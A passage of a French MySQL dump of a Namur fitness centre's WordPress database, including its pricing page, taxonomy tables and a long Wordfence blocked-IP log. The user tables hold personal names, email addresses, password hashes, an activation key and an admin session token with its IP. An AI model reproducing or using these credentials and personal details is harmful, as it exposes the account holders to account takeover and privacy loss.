(497, 3, '2015-09-02 17:07:48', '2015-09-02 17:07:48', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\r\n\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 17:07:48', '2015-09-02 17:07:48', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);

-- --------------------------------------------------------

--
-- Structure de la table `wp_termmeta`
--

CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `wp_terms`
--

CREATE TABLE `wp_terms` (
  `term_id` bigint(20) UNSIGNED NOT NULL,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_terms`
--

INSERT INTO `wp_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES
(1, 'Uncategorized', 'uncategorized', 0),
(2, 'Navigation', 'navigation', 0),
(3, 'test', 'test', 0),
(4, 'test', 'test', 0);

-- --------------------------------------------------------

--
-- Structure de la table `wp_term_relationships`
--

CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_term_relationships`
--

INSERT INTO `wp_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES
(1, 1, 0),
(16, 2, 0),
(15, 2, 0),
(14, 2, 0),
(24, 2, 0),
(25, 2, 0),
(150, 4, 0),
(150, 3, 0),
(148, 4, 0),
(148, 3, 0),
(371, 2, 0),
(471, 2, 0);

-- --------------------------------------------------------

--
-- Structure de la table `wp_term_taxonomy`
--

CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_term_taxonomy`
--

INSERT INTO `wp_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES
(1, 1, 'category', '', 0, 1),
(2, 2, 'nav_menu', '', 0, 7),
(3, 4, 'collaborateur_worksite', '', 0, 2),
(4, 3, 'collaborateur_service', '', 0, 2);

-- --------------------------------------------------------

--
-- Structure de la table `wp_usermeta`
--

CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) UNSIGNED NOT NULL,
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_usermeta`
--

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(1, 1, 'first_name', ''),
(2, 1, 'last_name', ''),
(3, 1, 'nickname', 'admin'),
(4, 1, 'description', ''),
(5, 1, 'rich_editing', 'true'),
(6, 1, 'comment_shortcuts', 'false'),
(7, 1, 'admin_color', 'fresh'),
(8, 1, 'use_ssl', '0'),
(9, 1, 'show_admin_bar_front', 'true'),
(10, 1, 'wp_capabilities', 'a:2:{s:13:\"administrator\";b:1;s:26:\"total_slider_manage_slides\";b:1;}'),
(11, 1, 'wp_user_level', '10'),
(12, 1, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,total-slider-help-pointer'),
(13, 1, 'show_welcome_panel', '1'),
(14, 1, 'wp_dashboard_quick_press_last_post_id', '499'),
(15, 1, 'managenav-menuscolumnshidden', 'a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),
(16, 1, 'metaboxhidden_nav-menus', 'a:2:{i:0;s:8:\"add-post\";i:1;s:12:\"add-post_tag\";}'),
(17, 1, 'wp_user-settings', 'hidetb=1&libraryContent=browse&editor=tinymce&wplink=1'),
(18, 1, 'wp_user-settings-time', '1500471321'),
(19, 1, 'nav_menu_recently_edited', '2'),
(20, 2, 'first_name', 'Julie'),
(21, 2, 'last_name', 'Pierrard'),
(22, 2, 'nickname', 'Julie'),
(23, 2, 'description', ''),
(24, 2, 'rich_editing', 'true'),
(25, 2, 'comment_shortcuts', 'false'),
(26, 2, 'admin_color', 'fresh'),
(27, 2, 'use_ssl', '0'),
(28, 2, 'show_admin_bar_front', 'true'),
(29, 2, 'wp_capabilities', 'a:1:{s:6:\"editor\";b:1;}'),
(30, 2, 'wp_user_level', '7'),
(31, 2, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media'),
(32, 2, 'wp_dashboard_quick_press_last_post_id', '399'),
(33, 2, 'wp_user-settings', 'editor=tinymce&hidetb=1'),
(34, 2, 'wp_user-settings-time', '1377249565'),
(35, 2, 'default_password_nag', ''),
(36, 3, 'first_name', ''),
(37, 3, 'last_name', ''),
(38, 3, 'nickname', 'Pablo'),
(39, 3, 'description', ''),
(40, 3, 'rich_editing', 'true'),
(41, 3, 'comment_shortcuts', 'false'),
(42, 3, 'admin_color', 'fresh'),
(43, 3, 'use_ssl', '0'),
(44, 3, 'show_admin_bar_front', 'true'),
(45, 3, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'),
(46, 3, 'wp_user_level', '10'),
(47, 3, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(48, 3, 'wp_dashboard_quick_press_last_post_id', '489'),
(49, 3, 'wp_user-settings', 'editor=html&libraryContent=browse&imgsize=full'),
(50, 3, 'wp_user-settings-time', '1441213598'),
(51, 1, 'session_tokens', 'a:1:{s:64:\"157e722d8f01df8e3bcf22daf6cf32b0ed5be56ead28cd41c6bde942c5690133\";a:4:{s:10:\"expiration\";i:1500644463;s:2:\"ip\";s:14:\"62.235.216.245\";s:2:\"ua\";s:73:\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\";s:5:\"login\";i:1500471663;}}');

-- --------------------------------------------------------

--
-- Structure de la table `wp_users`
--

CREATE TABLE `wp_users` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_users`
--

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'admin', '$P$BTxsluD39ZNDDlm.YtLuQVMqrm.eH0/', 'admin', 'dpierrard@gmail.com', '', '2013-05-23 18:04:49', '$P$BxqH6HRM5.Jjnlf4TrMo0kny8TupwD/', 0, 'admin'),
(2, 'Julie', '$P$BgQ7uEA82zTYq3q0onbcq/W0rc8syx0', 'julie', 'juliepierrard@hotmail.com', '', '2013-08-23 09:08:58', '', 0, 'Julie Pierrard'),
(3, 'Pablo', '$P$BogLy0dg73K6JpgjPUqkqNJar.mmff.', 'pablo', 'wepion@gmail.com', '', '2015-09-02 16:42:58', '', 0, 'Pablo');

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfBadLeechers`
--

CREATE TABLE `wp_wfBadLeechers` (
  `eMin` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `hits` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfBlockedIPLog`
--

CREATE TABLE `wp_wfBlockedIPLog` (
  `IP` int(10) UNSIGNED NOT NULL,
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `unixday` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfBlockedIPLog`
--

INSERT INTO `wp_wfBlockedIPLog` (`IP`, `countryCode`, `blockCount`, `unixday`) VALUES
(1829643291, 'FR', 1, 17339),
(19917958, 'TH', 1, 17339),
(1091807106, 'US', 1, 17339),
(3139973540, 'BR', 1, 17339),
(1442374565, 'SK', 1, 17339),
(3032436716, 'PH', 1, 17334),
(3358968011, 'BR', 1, 17334),
(3532827868, 'JP', 1, 17334),
(3682725338, 'CN', 9, 17334),
(1442374564, 'SK', 1, 17334),
(2875375532, 'TH', 1, 17334),
(3154288046, 'RS', 1, 17334),
(657627066, 'PK', 1, 17334),
(418884769, 'US', 1, 17334),
(1521628389, 'CZ', 1, 17334),
(3115319218, '', 1, 17334),
(2975005806, 'BR', 1, 17334),
(1516638931, 'FR', 1, 17335),
(3682725338, 'CN', 9, 17335),
(1705472359, 'AU', 1, 17335),
(704366584, 'MA', 1, 17335),
(1892043087, 'PH', 1, 17335),
(3318955358, 'NG', 1, 17335),
(3583324965, 'HR', 1, 17335),
(2979849631, 'BR', 1, 17335),
(1293700813, 'MK', 1, 17335),
(703027240, 'TN', 1, 17335),
(1935748769, 'IN', 1, 17335),
(1700951514, 'NZ', 1, 17335),
(1336721696, 'HU', 1, 17335),
(2376729141, 'GB', 1, 17336),
(2946418994, 'PH', 1, 17336),
(1675930294, 'CA', 1, 17336),
(1539837014, 'UA', 2, 17336),
(2970345110, 'BR', 1, 17336),
(3124507901, 'AR', 1, 17336),
(3682725338, 'CN', 4, 17336),
(1547655939, 'LV', 1, 17336),
(1332056195, 'RS', 1, 17336),
(1517874559, 'FR', 1, 17333),
(1439252880, 'BE', 1, 17333),
(1892747498, 'PH', 1, 17333),
(2192896078, 'RS', 1, 17333),
(1476942175, 'ES', 1, 17333),
(1539837019, 'UA', 1, 17332),
(2996915206, 'KW', 1, 17332),
(1833145697, 'IL', 1, 17332),
(3743340614, 'IN', 1, 17332),
(1868300323, 'IN', 1, 17332),
(1814215517, 'US', 1, 17332),
(3682725338, 'CN', 6, 17339),
(3305249319, 'TN', 1, 17338),
(2945352912, 'MY', 1, 17338),
(1337055094, 'IL', 1, 17338),
(1021415560, 'AU', 1, 17338),
(1556308942, 'DE', 1, 17338),
(1337221594, 'IL', 1, 17338),
(832017728, 'PH', 1, 17338),
(3661641996, 'CN', 1, 17338),
(2945386850, 'MY', 1, 17338),
(1053979479, 'FR', 1, 17338),
(2050666736, 'NZ', 1, 17333),
(3682725338, 'CN', 7, 17333),
(1892867061, 'PH', 1, 17333),
(3583324972, 'HR', 1, 17332),
(3374681884, 'BR', 1, 17338),
(3682725338, 'CN', 8, 17338),
(3192913058, 'VE', 1, 17337),
(1466596995, 'DE', 20, 17337),
(1892921625, 'PH', 1, 17337),
(1733567786, '', 1, 17337),
(2982565155, 'BR', 1, 17337),
(3207991142, 'BR', 1, 17337),
(3682725338, 'CN', 7, 17337),
(1539837019, 'UA', 1, 17337),
(2946425103, 'PH', 1, 17337),
(1442664703, 'EE', 1, 17337),
(1451215676, 'RO', 1, 17336),
(529855267, 'RU', 1, 17313),
(3170385964, 'SA', 1, 17313),
(1539836981, 'UA', 2, 17313),
(1835212154, 'RO', 1, 17313),
(3489067105, 'US', 40, 17313),
(1042038966, 'PT', 1, 17313),
(1828725654, 'FR', 1, 17312),
(783835753, 'SA', 1, 17312),
(1534992972, 'ES', 1, 17312),
(1828725649, 'FR', 1, 17312),
(3387838170, 'TT', 1, 17312),
(781668949, 'UA', 1, 17312),
(1495116718, 'ES', 1, 17312),
(2030594922, 'CN', 1, 17312),
(1563679021, 'IT', 1, 17312),
(2949647692, 'KR', 1, 17312),
(1046956164, 'GR', 1, 17312),
(3397466494, 'TH', 1, 17312),
(1760853483, 'US', 1, 17311),
(3242600154, 'IT', 1, 17310),
(3590043248, 'FR', 1, 17310),
(1079652533, 'US', 1, 17306),
(3497113622, 'US', 1, 17306),
(3056768804, 'SG', 1, 17306),
(1586073137, 'DK', 1, 17307),
(1119841390, 'US', 1, 17307),
(598138358, 'US', 1, 17307),
(3497114222, 'US', 1, 17307),
(3105930270, 'PT', 1, 17307),
(3476728705, 'US', 1, 17307),
(3280140082, 'IT', 1, 17307),
(1168360410, 'US', 1, 17307),
(3586257058, 'NL', 1, 17307),
(1741512757, '', 1, 17307),
(1833311020, 'RU', 1, 17308),
(3237921028, 'US', 1, 17308),
(1729627112, 'HK', 1, 17308),
(1495980045, 'RO', 1, 17308),
(3163163411, 'DE', 1, 17309),
(842965149, 'US', 1, 17309),
(3635199372, 'US', 1, 17309),
(3497113622, 'US', 2, 17310),
(842969123, 'US', 1, 17310),
(1732504330, '', 1, 17310),
(3098024843, 'US', 1, 17294),
(2111103174, 'VN', 1, 17294),
(762746819, '', 3, 17294),
(3527006264, 'ID', 1, 17294),
(3164982411, 'FR', 1, 17294),
(3059525007, 'CN', 1, 17294),
(521678460, 'ES', 1, 17294),
(1743622318, 'VN', 1, 17294),
(1578617924, 'FR', 1, 17294),
(736163900, 'TW', 1, 17295),
(3590043250, 'FR', 1, 17295),
(1299175467, 'GB', 1, 17295),
(1743847615, 'AU', 1, 17297),
(2513063543, 'DE', 1, 17297),
(1570692602, 'NL', 1, 17297),
(2901752882, 'US', 1, 17297),
(1572433768, 'CZ', 1, 17297),
(469651732, 'TH', 2, 17292),
(2988470183, 'FR', 3, 17292),
(3164982411, 'FR', 3, 17292),
(3353828771, 'US', 2, 17292),
(702768013, 'TN', 1, 17284),
(2873895206, 'IN', 1, 17284),
(2058018895, 'IN', 1, 17284),
(608761984, 'ID', 1, 17284),
(1549131029, 'RO', 1, 17284),
(3197714889, 'VE', 1, 17285),
(2979895540, 'BR', 1, 17285),
(3039577960, 'AR', 1, 17285),
(3304677463, 'ZA', 1, 17285),
(1023584817, 'IN', 1, 17285),
(1430349643, 'IL', 1, 17285),
(1149515385, 'US', 1, 17285),
(2917961944, 'US', 1, 17286),
(3195004720, 'AR', 1, 17287),
(773229120, 'IE', 1, 17288),
(1571457074, 'CZ', 1, 17289),
(794450239, 'CA', 1, 17289),
(3326600728, 'US', 1, 17289),
(3644686526, 'DK', 1, 17289),
(3497113801, 'US', 1, 17291),
(3497113622, 'US', 1, 17291),
(3497110456, 'US', 1, 17291),
(3590043250, 'FR', 1, 17291),
(3191614634, 'VE', 1, 17291),
(1138881296, 'US', 2, 17292),
(3069127338, 'MY', 1, 17292),
(3346287710, 'US', 1, 17292),
(1632245985, 'US', 1, 17292),
(831636304, 'PH', 1, 17284),
(1887828803, 'IN', 1, 17283),
(1396104586, 'ES', 1, 17283),
(3157204740, 'PL', 1, 17283),
(3382964636, 'MX', 1, 17283),
(637050808, 'PL', 1, 17283),
(28968311, 'IN', 1, 17283),
(621184356, 'GR', 1, 17283),
(3412761521, 'MY', 1, 17284),
(1317189474, 'BG', 1, 17283),
(2391196847, 'CA', 1, 17283),
(1892041857, 'PH', 1, 17283),
(3142072067, 'BR', 1, 17283),
(842254621, 'US', 1, 17281),
(2320235926, 'SG', 1, 17281),
(2399207350, 'US', 1, 17281),
(2637388761, 'ID', 1, 17281),
(3754818252, 'TH', 1, 17281),
(1741772220, '', 1, 17281),
(702756256, 'TN', 1, 17281),
(2943288819, 'PK', 1, 17281),
(2738198454, 'BD', 1, 17281),
(1401323221, 'BE', 1, 17281),
(1887842097, 'LK', 1, 17281),
(1293756220, 'MK', 1, 17281),
(1589523921, 'RU', 12, 17281),
(702589396, 'TN', 1, 17281),
(3017071845, 'BR', 1, 17281),
(2957549377, 'FI', 1, 17281),
(1565928623, 'RS', 1, 17281),
(3182212288, 'MX', 1, 17282),
(1223522106, 'US', 1, 17282),
(1590804861, 'NL', 1, 17282),
(3360841433, 'AR', 1, 17282),
(1589523921, 'RU', 26, 17282),
(832022104, 'PH', 1, 17282),
(702781337, 'TN', 1, 17282),
(1835651188, 'BA', 1, 17282),
(2760119799, 'IT', 20, 17282),
(1833643342, 'AM', 1, 17282),
(86750727, 'HR', 1, 17282),
(1589523921, 'RU', 34, 17283),
(3159244987, 'ES', 1, 17283),
(2630993580, '', 1, 17272),
(1855915268, 'MY', 1, 17272),
(2057822968, 'IN', 1, 17272),
(625844236, 'IT', 1, 17272),
(1308677291, 'HR', 1, 17272),
(1546989467, 'MK', 1, 17272),
(2050351307, 'PH', 1, 17272),
(2969824596, 'BR', 1, 17272),
(1833643342, 'AM', 1, 17272),
(1327449813, 'IT', 1, 17272),
(3237666864, 'US', 1, 17292),
(2111103174, 'VN', 1, 17292),
(762746819, '', 1, 17292),
(3098029782, 'US', 1, 17293),
(3098024846, 'US', 1, 17293),
(3069127338, 'MY', 2, 17293),
(3346287710, 'US', 1, 17293),
(2727364316, 'US', 4, 17293),
(3527006264, 'ID', 1, 17293),
(1893028934, 'VN', 1, 17293),
(633031051, 'FR', 1, 17293),
(1743622318, 'VN', 1, 17293),
(762746819, '', 1, 17293),
(2996829330, 'RU', 2, 17293),
(3098024781, 'US', 1, 17293),
(1053997316, 'FR', 1, 17293),
(1138881296, 'US', 1, 17293),
(3056763559, 'SG', 2, 17293),
(3098029701, 'US', 2, 17293),
(3423600883, 'US', 1, 17293),
(2202594575, 'CL', 1, 17293),
(2746000698, 'GB', 1, 17293),
(1741681534, '', 1, 17332),
(3231737508, 'US', 1, 17332),
(1547655939, 'LV', 1, 17332),
(3682725338, 'CN', 10, 17332),
(1053979353, 'FR', 1, 17331),
(3386002506, 'VE', 1, 17331),
(528486593, 'PL', 1, 17331),
(842965026, 'US', 1, 17331),
(2037512030, 'JP', 1, 17331),
(3233382727, 'US', 1, 17331),
(1547655939, 'LV', 1, 17331),
(3682725338, 'CN', 12, 17331),
(3682725338, 'CN', 4, 17330),
(2032808987, 'CN', 2, 17328),
(1840808480, 'RU', 20, 17328),
(1732504327, '', 1, 17328),
(1985724027, 'IN', 1, 17327),
(3063980351, 'AU', 1, 17326),
(136172254, 'US', 20, 17326),
(1601092177, 'IT', 1, 17325),
(2065606982, 'VN', 1, 17325),
(1728496878, 'MY', 20, 17324),
(3741061572, 'VN', 1, 17324),
(1109513350, 'US', 1, 17324),
(2745977144, 'GB', 1, 17324),
(96963116, 'DE', 20, 17324),
(1053979479, 'FR', 1, 17324),
(1168352192, 'US', 20, 17323),
(96963116, 'DE', 20, 17323),
(2014968716, 'CN', 1, 17323),
(3163163411, 'DE', 1, 17323),
(1984277895, 'VN', 1, 17323),
(788319630, 'NL', 1, 17322),
(96963116, 'DE', 20, 17322),
(1168352192, 'US', 20, 17322),
(3489067105, 'US', 20, 17322),
(1168352192, 'US', 20, 17321),
(2833926914, 'GT', 1, 17321),
(1307193800, 'NO', 1, 17321),
(874456664, 'US', 1, 17321),
(1707700163, 'CN', 1, 17321),
(1539837082, 'UA', 5, 17320),
(1539837019, 'UA', 1, 17320),
(1049988935, 'IT', 20, 17320),
(1539836946, 'UA', 1, 17320),
(3489067105, 'US', 20, 17320),
(1741512757, '', 1, 17320),
(96963116, 'DE', 20, 17320),
(96963116, 'DE', 20, 17319),
(1728496878, 'MY', 20, 17319),
(1266634707, 'US', 1, 17318),
(1707700163, 'CN', 1, 17318),
(788319630, 'NL', 1, 17318),
(1539837019, 'UA', 2, 17318),
(3489067105, 'US', 20, 17317),
(1539837019, 'UA', 1, 17317),
(3163163411, 'DE', 1, 17317),
(1049988935, 'IT', 20, 17317),
(2734175325, 'US', 1, 17316),
(3164986572, 'FR', 1, 17316),
(96963116, 'DE', 40, 17316),
(1563679021, 'IT', 1, 17314),
(3001689384, 'RU', 1, 17314),
(3415091724, 'MY', 1, 17314),
(3362989667, 'EC', 1, 17314),
(3415089988, 'MY', 1, 17314),
(3107039490, 'ES', 1, 17313),
(2949647692, 'KR', 1, 17313),
(1835212158, 'RO', 1, 17313),
(1828828346, 'FR', 1, 17313),
(2156323210, 'KR', 2, 17313),
(3254658399, 'ES', 1, 17314),
(529853472, 'RU', 1, 17313),
(3152885982, 'MX', 1, 17313),
(3254658403, 'ES', 1, 17313),
(3387838170, 'TT', 1, 17313),
(3151105913, 'MX', 1, 17313),
(1729627112, 'HK', 1, 17313),
(3168080791, 'RO', 1, 17313),
(3555103830, 'KR', 1, 17313),
(1563679021, 'IT', 1, 17313),
(2548839223, 'GB', 2, 17313),
(3254658391, 'ES', 1, 17313),
(3497113622, 'US', 1, 17299),
(1168365674, 'US', 1, 17299),
(1572433768, 'CZ', 1, 17299),
(1728585030, 'AU', 1, 17298),
(794439728, 'CA', 1, 17298),
(3116589525, '', 1, 17298),
(1119841390, 'US', 1, 17298),
(1835211794, 'RO', 1, 17314),
(3254658395, 'ES', 1, 17314),
(3254658598, 'ES', 1, 17314),
(3735412901, 'ID', 1, 17312),
(1845364905, 'UA', 1, 17312),
(3489067105, 'US', 40, 17312),
(1835212082, 'RO', 2, 17312),
(1941604657, 'PK', 1, 17312),
(3423600883, 'US', 1, 17294),
(794439728, 'CA', 1, 17293),
(1279978460, 'US', 1, 17293),
(3164986572, 'FR', 1, 17293),
(1578617924, 'FR', 1, 17293),
(2746000698, 'GB', 1, 17294),
(1066387086, 'US', 1, 17278),
(1837181866, 'BE', 1, 17280),
(1473126706, 'PL', 1, 17280),
(86724239, 'BA', 1, 17280),
(627635047, 'SA', 1, 17278),
(835553714, 'IN', 1, 17278),
(1459691243, 'IT', 1, 17280),
(1242501469, 'CA', 1, 17280),
(1484515861, 'FR', 1, 17280),
(1483800238, 'FI', 1, 17278),
(1741894664, '', 1, 17278),
(656634353, 'PK', 1, 17278),
(45319675, 'IR', 1, 17266),
(3191614634, 'VE', 1, 17293),
(2997180598, 'UA', 2, 17268),
(2036512991, 'NZ', 1, 17268),
(2567295251, 'SI', 1, 17267),
(1335820244, 'ES', 1, 17267),
(1372304315, 'ES', 1, 17277),
(3081456248, 'MY', 1, 17278),
(3356055950, 'BR', 1, 17278),
(1729276347, 'IN', 1, 17277),
(2548839248, 'GB', 1, 17266),
(1388568683, 'CH', 1, 17266),
(1728496878, 'MY', 20, 17266),
(3134227165, 'BR', 1, 17266),
(2630650147, '', 1, 17266),
(831661798, 'PH', 1, 17265),
(2030594922, 'CN', 1, 17265),
(1892753981, 'PH', 1, 17280),
(973646844, 'TH', 1, 17279),
(1300185300, 'IL', 1, 17279),
(1480982105, 'DE', 1, 17279),
(1075856298, 'DO', 1, 17279),
(1652555154, 'US', 1, 17279),
(462680889, 'BD', 1, 17279),
(693760773, 'KE', 1, 17279),
(1660897944, 'US', 1, 17279),
(756559839, 'US', 1, 17279),
(96963116, 'DE', 20, 17315),
(1539837113, 'UA', 109, 17315),
(700515628, 'ZA', 1, 17314),
(3586257058, 'NL', 1, 17314),
(2032732065, 'CN', 2, 17314),
(1539837019, 'UA', 1, 17314),
(781668949, 'UA', 1, 17314),
(1501163646, 'RO', 1, 17314),
(786077451, 'FR', 1, 17314),
(3397466494, 'TH', 1, 17314),
(1828828346, 'FR', 1, 17314),
(1342920287, 'FR', 1, 17314),
(48857242, 'IT', 1, 17314),
(3489067105, 'US', 20, 17314),
(3170385964, 'SA', 1, 17312),
(1042038966, 'PT', 1, 17312),
(1401863434, 'PL', 1, 17312),
(3254658598, 'ES', 1, 17312),
(3107039609, 'ES', 1, 17312),
(2997180598, 'UA', 1, 17272),
(3557016176, 'DE', 1, 17272),
(1781731329, 'IN', 1, 17270),
(838336850, 'IN', 1, 17271),
(1602695291, 'UA', 1, 17268),
(1487682955, 'FR', 1, 17268),
(694240377, 'DZ', 1, 17268),
(3159219059, 'ES', 1, 17267),
(1049988937, 'IT', 20, 17267),
(3528003588, 'CN', 1, 17266),
(1897363733, 'VN', 1, 17277),
(1331015039, 'FR', 1, 17277),
(656718336, 'PK', 1, 17277),
(3075658538, 'IN', 1, 17277),
(1311451404, 'DE', 1, 17277),
(18240054, 'IN', 1, 17276),
(2053535298, 'IN', 1, 17277),
(2807568394, 'CA', 1, 17277),
(3220923904, 'BR', 1, 17276),
(1197448705, 'US', 1, 17276),
(1449745144, 'RO', 1, 17283),
(1743079446, 'ID', 1, 17266),
(1495980045, 'RO', 1, 17266),
(3384842088, 'CR', 1, 17266),
(3630295265, 'US', 1, 17266),
(2420947331, 'DE', 1, 17266),
(3190692170, 'CL', 1, 17267),
(1176630934, 'CA', 1, 17266),
(1410995141, 'NL', 1, 17266),
(633011686, 'IT', 1, 17265),
(2631042583, '', 1, 17265),
(3423600883, 'US', 2, 17292),
(2746000698, 'GB', 1, 17292),
(2057770254, 'IN', 1, 17275),
(1517306635, 'FR', 1, 17274),
(1502215624, 'RO', 1, 17274),
(694713201, 'DZ', 1, 17275),
(2057397147, 'IN', 1, 17275),
(1380787961, 'RO', 1, 17274),
(1825994579, 'US', 1, 17274),
(3176910774, 'BR', 1, 17265),
(1744088829, 'PK', 1, 17265),
(1327441816, 'IT', 1, 17279),
(1868429218, 'IN', 1, 17278),
(3000994407, 'RS', 1, 17278),
(3452436806, 'CA', 1, 17277),
(1269756669, 'US', 1, 17274),
(1053969232, 'FR', 1, 17306),
(1168360410, 'US', 1, 17306),
(1427222478, 'NL', 1, 17300),
(1659124010, 'US', 1, 17273),
(2077463425, 'AU', 1, 17274),
(3173368969, 'BR', 1, 17274),
(3536047280, 'MY', 1, 17271),
(1394350159, 'PL', 1, 17271),
(1434732386, 'AZ', 1, 17305),
(1539837019, 'UA', 2, 17305),
(1539837019, 'UA', 1, 17304),
(3059525007, 'CN', 1, 17304),
(783839564, 'SA', 1, 17312),
(1828828346, 'FR', 2, 17312),
(1539837019, 'UA', 2, 17311),
(3497110456, 'US', 1, 17311),
(3098024844, 'US', 1, 17292),
(1632276610, 'US', 1, 17292),
(1312794843, 'LT', 1, 17270),
(3393065050, 'ID', 1, 17270),
(3153760673, 'MX', 1, 17270),
